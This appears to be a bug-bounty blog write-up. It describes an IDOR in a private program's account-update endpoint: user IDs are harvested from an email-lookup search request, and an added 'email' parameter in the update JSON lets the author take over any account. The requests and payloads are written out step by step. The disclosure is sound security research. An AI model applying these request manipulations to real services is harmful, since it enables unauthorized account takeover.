IDOR — Account Takeover

Hi Guy,

After a long time i decided to share some of my finding & contribute to this awsm community. This write up is all about the IDOR that i found in PRIVATE program that I hunting from past 1 Year.

So there is a request that update the account username https://www.site/dataentities/CL/documents/0e84b3b2-c65f-11e8–822e-0edf00549f0a` contain the following data {“firstName”:”john”,”lastName”:”account”,”document”:”32132132132",”birthDate”:”2019–05–30T00:00:00",”gender”:”male”,”homePhone”:”1000000000"}

so I notice 0e84b3b2-c65f-11e8–822e-0edf00549f0a is the user ID I created another account and replace the other account & able to change the first & last name of my 2nd account. But the USER-ID is hard to guess after spending the alot of time crawling the web i notice that there is a req that web send to server just to verify that if this email is registered or not the request look like this https://www.site.com/site/dataentities/CL/search/?email=attacker@gmail.com & the response look like this [{“email”:”attacker@gmail.com”,”id”:”0e84b3b2-c65f-11e8–822e-0edf00549f0a”}] so USER-ID problem is solved :D

I try to dig more & try to change the email i notice that the input field code is this <input type=”email” name=”email” value=”attacker@gmail.com” /> so in the update account detail this is the JSON data that send to the server {“firstName”:”john”,”lastName”:”account”,”document”:”32132132132",”birthDate”:”2019–05–30T00:00:00",”gender”:”male”,”homePhone”:”1000000000"} i add email parm & value so that JSON data look like this {“firstName”:”john”,”lastName”:”account”,”document”:”32132132132",”birthDate”:”2019–05–30T00:00:00",”gender”:”male”,”homePhone”:”1000000000", “email”:”attacker2@gmail.com”} & boom i able to change any one email which lead to Account Takeover

Without wasting time i make a good report & reported to the team and this is the response that is get from

and after some time the Analyst come

Lesson : Alway try harder :D hope you like it

./LOGOUT